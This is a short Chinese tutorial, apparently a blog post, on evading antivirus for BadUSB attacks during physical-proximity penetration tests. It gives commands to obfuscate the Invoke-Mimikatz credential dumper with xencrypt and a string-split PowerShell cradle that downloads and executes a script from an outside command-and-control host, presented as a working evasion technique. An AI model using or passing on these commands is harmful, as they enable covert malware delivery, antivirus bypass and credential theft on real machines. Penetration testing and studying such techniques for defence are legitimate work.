近源渗透测试badusb执行代码的免杀

在进行近源渗透测试的时候，我们发现国内杀软对powershell的管制非常的严格，只要有后台隐藏执行的powershell都会触发可疑行为警报，但是这不代表不能绕过。

生成powershell payload

如图生成payload，我们使用powershell的payload，就不用勾选64位了

powershell混淆

接下来做混淆，否则ps脚本下载下来也是被杀软秒杀的，可以使用InvokeObfuscation或者xencrypt。
我这里使用的是xencrypt

Import-Module ./xencrypt.ps1
Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1 -Iterations 68

可以选择免杀68次
https://github.com/the-xentropy/xencrypt

badusb运行脚本拆分免杀

由于免杀后的脚本会很大，所以我们可以用powershell IEX(New-Object Net.WebClient).DownloadString("http://x.x.x.x/2.ps1")从服务器下载ps脚本运行，但是会被杀软杀，所以可以用拆分免杀。

powershell.exe ”$a1='IEX ((new-objectnet.webclient).downl';$a2='oadstring(''http://c2.mtfly.net/2.ps1''))';$a3="$a1,$a2";IEX(-join $a3)""